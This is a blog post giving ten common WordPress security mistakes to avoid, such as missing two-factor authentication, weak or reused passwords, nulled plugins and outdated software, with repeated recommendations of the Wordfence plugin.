Wordpress security mistakes to avoid

10 WordPress Security Mistakes to Avoid

Disclosure: Some links included in the sidebar are affiliate links, which means we receive a small commission at no cost to you if you purchase through a link. 

In a recent blog post, following the release of the WordPress 5.5 update, I shared some ways to fix a WordPress website which is broken due to the update.

There’s nothing more frustrating than finding out that your website is broken due to WordPress security problems is there? It also doesn’t do your reputation any favors when your clients inform you that you have a broken website.

They say that prevention is the best medicine, so to help you be better prepared, here are 10 common WordPress security mistakes that can be easily avoided.

Before I get started, I’m going to suggest that you check out the Wordfence WordPress security plugin which I install on all client sites. I’ve highlighted various Wordfence features throughout this post to help protect your website against the dangers highlighted. Wordfence follows the common WordPress freemium model and there are both free and premium (annual fee) versions of the plugin.

Now on to the mistakes….

1) Poor Quality, Insecure Website Hosting

Before we get into the WordPress security specifics, it is important to start with your hosting. Did you know that according to a University of Maryland Study, there is a hacker attempt every 39 seconds, making the security of your website hosting of paramount importance.

Website hosting comes in all sorts of different offerings and price points. In my experience you generally get what you pay for and unfortunately website and WordPress security can easily take a back seat.

When we recently put together the hosting for our shortly to be launched WordPress managed site service we ensured that our offering included the following:-

2) Not Using Two-Factor Authentication

Two-factor authentication (often shortened to 2FA) put simply, means there are two checks in place to prove your identity when you login to your website.

One common way to do this, which you have no doubt come across is by way of a code being sent via SMS to your nominated mobile/cell phone number. As an added security measure you have a certain timeframe to enter this code and gain access.

By default, WordPress does not include 2FA but the Wordfence WordPress security plugin (option available in both free and premium versions) mentioned earlier includes this capability and is highly recommended. Wordfence will work with any authenticator app that supports Time-based One-Time Passwords (TOTP) including:-

3) The Use of an “admin” Login Username

The odds of your website’s WordPress security being compromised increases significantly when you use an ‘admin’ username. Many automated scripts and hacking attempts will try this username in the first instance, so you are making it easy for them.

Instead use something else which is not obvious.

4) Using Easily Compromised Passwords

Ensure that your passwords are also not something that can be easily guessed. If you need help coming up with a secure password then there are password generators available.

Firefox password generator

For example, you can randomly generate a password in the Firefox browser as shown above. Just right click on the password field as shown. You can also do the same process to create a secure username.

Make sure you safely store your password somewhere though because unless you are Albert Einstein you will struggle to remember it!

The Wordfence WordPress security plugin also includes a setting that will require all website users to use a strong password.

How secure is my password

If you want to find out how long it would take to hack your password then check out this site and enter your password.

I think I can sleep peacefully with this result.

5) No protection against Brute Force Attack

A Brute Force Attack occurs when there are a large number of repeated attempts to gain access by guessing your username and password.

Limiting the number of login attempts allowed and blocking those who try more than a certain number of times provides a means of protection for your website.

Wordfence WordPress security plugin brute force attack settings

The Wordfence WordPress security plugin (both free and premium versions) also includes functionality to prevent a Brute Force Attack.

You can see some of the settings above.

6) Poor User Role Management

I suggest that when assigning roles to site users that you go with the “principle of least privilege”. Provide them with the minimum access possible to be able to do what they need to do.

Generally speaking their access should be either Subscriber or Contributor and ensure that you do not allow open registrations on your website.

Wordpress anyone can register setting

To do this, ensure that the “Anyone can register” checkbox is not checked under Membership on the Settings -> General page in the WordPress dashboard.

7) Reusing Same Passwords Over and Over

Another common cause of WordPress security issues is due to passwords being used that have been in a data breach elsewhere. Hackers can easily gain access to lists of these passwords making your website an easy target for them.

Wordfence WordPress security plugin password setting

The Wordfence WordPress security plugin will also prevent the use of passwords that have been leaked in data breaches to provide further peace of mind.

8) Using Nulled Themes or Plugins

You’ve no doubt heard your share of tales of people reporting the infection of their computers due to pirated/free software being installed which has hidden malware and other malicious items. Well the same applies to offerings of WordPress themes or plugins free of charge.

They should be avoided to ensure you do not end up with unauthorised advertising occurring or other malware of hacking problems.

9) Not Keeping WordPress Updated

Keeping your WordPress core, updates and plugins up to date will help to ensure that any vulnerabilities in your themes and plugins are patched. I also suggest doing a plugin audit and removing any inactive plugins from your website.

Vulnerabilities in inactive plugins and themes can still allow your website to be compromised and they are easily missed. They may not be in use but they are still installed in your WordPress environment and can be exploited by hackers.

10) No firewall Monitoring Website Traffic

A firewall is an extremely important security requirement for your website and will monitor traffic and determine whether or not requests are genuine and should be authorised or not. Wordfence includes a firewall with many features and you can find out more about their sophisticated firewall here.

I know that the topic of security can quickly overwhelm many and there’s a lot to consider.

I hope you found the tips shared in this post helpful. Are you looking for further details on any of the suggestions made? Please let me know in the comments.

A tiny request: If you liked this post, please share this?

I know most people don’t share because they feel that we don’t need their “tiny” social share. But here’s the truth…

I built this blog piece by piece, one small share at a time, and will continue to do so. So thank you so much for your support, my reader.

A share from you would seriously help a lot.

Some great suggestions:
– Pin it!
– Share it to your favorite blog + biz Facebook group
– Tweet it!
– Share it on LinkedIn!

It won’t take more than 10 seconds of your time. The share buttons are right here. 🙂

Thank you so much!

Leave a comment

Before you go...

Grab your free Ultimate Website Planning Checklist. It will help you plan your website easier than ever!